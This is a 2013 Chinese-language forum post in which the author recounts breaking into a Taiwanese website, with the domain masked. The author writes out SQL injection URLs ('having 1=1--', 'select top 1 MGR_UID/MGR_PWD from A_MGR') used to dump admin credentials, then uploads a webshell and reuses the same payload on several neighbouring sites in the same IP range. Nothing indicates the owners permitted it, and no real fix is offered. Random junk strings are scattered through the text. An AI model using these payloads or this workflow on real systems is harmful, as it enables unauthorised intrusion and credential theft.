发现一个注入点
# u$ g2 z1 \5 K9 Z1 H/ hhttp://www.xxx.com /Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI20120506105833896 f5 `) q+ v0 {; ?- f
' ~/ f' c! p+ c. O) J9 P2 d- P习惯性的加’having1=1--
# `: S5 R9 U( Z- Y- [9 M/ R' `1 e D H+ [# [
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’having 1=1—1 y$ z% u0 p, i: z$ x4 D
) C3 j0 l, h% V6 t
0
- @* t2 [9 u2 ]: v7 g& B8 e
1 N d( p5 [$ C( R2 v, J2 u; F爆出Diary_A.dl_Title(这时候很激动啊). J5 L6 P! ^* @( A$ ~, ]& k
: p0 f+ Z5 O$ d, Y那么继续
) @. _8 R* w* s' F0 m, V0 M, t! shttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’group by dl_Title having 1=1—
, A( L6 x1 E2 l3 \, x! l! x6 W/ I- Y9 F5 O
继续,一直爆下去/ n4 F' L; j8 D D; w" {( R8 n
5 d+ j' b3 @1 z- D; j) }3 w1 H$ h爆到几个字段和表段 但是没找到需要的管理用户的字段; Y: h* y2 c3 G1 `7 ]
! v1 J6 o) i+ F9 e
蛋疼了 怎么办 然后去后台登陆页看源码; |8 D( y1 ?3 Y$ ^; N* n( [
2 J# u: ]+ Z8 r8 Y
0! ~0 N' n5 w0 E0 ]) ~& A5 @
6 u; j& j% F) N1 B: C5 o5 w# p, aInput name= “ADUID”! [: r6 n" T* x- j5 v, `( V
Input name= “ADPWD”; x' v3 h$ E+ l) S) {3 D
! Z) }3 @( c2 r3 _- t; z2 R5 M
很幸运 找到了字段那就继续
( A5 k9 m" y2 G- R; ~找到之后开始爆用户1 n) ^9 l! Q# _; J. w
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_UID from A_MGR)>0—$ r8 g& K/ N# V7 G
爆密码
4 h) S: R' U) m( M `- ]# ?http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_PWD from A_MGR)>0—( u6 V+ l. V1 _+ ~* ~
测试了下 这个注入点只能爆到文章哪里的表
: \( X C' o* e7 \& I3 |, H7 x& K) p+ C5 s s! M, c
头疼 继续 既然只能报道文章哪里的表去后台爆 不过后台字符限制了7 J! } M" x% w8 j- h0 z
* @) _4 p2 P4 s4 T/ T% m# }
又想到 用户登录哪里也可以的吧就去试试 果然 今天我很幸运吧 爆出来了7 W( K2 ]) q3 _, G( o
x5 z, B) p4 B5 M4 w473
3 C& E( { G5 b, j, C
/ v9 l4 e' d' n8 w3 V& B* s进后台
" D7 d3 u. O9 q; b% }7 Q
- x* w9 |; M1 `' F( q, S `9 N/ i; N
发现几个上传点 有的地方不能上传 而且防止恶意代码9 d7 i# k- w+ {0 M
7 {) z1 L. _& J- n. [没办法 各种百度各种找大牛 找到一只好像可以突破的马1 b! |, D* Q8 P; Z
; r/ {( h6 W5 u% g+ }3 U6 J
' ]0 z7 t) Y, j" a5 B在系统管理那里直接上传 不过没有显示地址; j8 }0 B$ v) b
( M# T9 O( w, B2 _
再上传一次 抓包 搞定OK
- R# m/ s8 s0 f: E, A) j2 x, h3 u: A. A* w; u0 \' M# [2 K6 e1 K2 T: E
8 P. X5 n6 }! S
3 l. @$ {' ]/ S5 N+ I472
( {$ t7 a2 E' Q. i( s ^" O" w1 L
晚上不行了 去睡觉。。。
" q6 _( p6 v( K4 a5 ]; w7 l# ~* {第二天刚起床 闲的没事做继续日站吧 8 C& i) b+ l1 h1 A
' o8 I. r7 q& T6 a+ k找个站 就把这个站的旁c扫了下
. x+ W4 J: b& L4 a5 j; t1 G% m9 c$ l/ J
# K; N4 D: l4 I发现c段也有一个购物站 ,然后还和这个站的模板差不多
0 b' w' }7 T6 Z
2 [) P# m! ]$ i- J0 n就找到会员登录口测试3 u+ V! q$ \* t& L& r
( d9 R' C/ W4 h9 S) w'and (select top 1 MGR_UID from A_MGR)>0—$ a6 Q. `( Z6 _7 m" k
果断爆到了 这时候我很激动 通杀
8 C7 |" I* q% O+ Z2 R J) C' Y6 ?6 y0 ^) y [
再次翻c段( ^, z, K" l9 ]
3 m, _, S+ f; ]+ c a翻出几个站 都成功拿下
$ b6 ^1 w/ ]& I% M( C5 a+ D- S* O( C
& E- h" W/ F* S( }3 e
# b& p9 F6 F: k
修复方案:
- E3 Y: V2 x1 {# {" q他们比我专业 4 ^0 {! E# Z% e U
2 @ E, D" x$ C* z: b
/ V7 c' a" W9 u2 Q
6 ]2 L* J9 W I: ~! v |
发表于 2013-4-4 17:40:38
收藏
支持
反对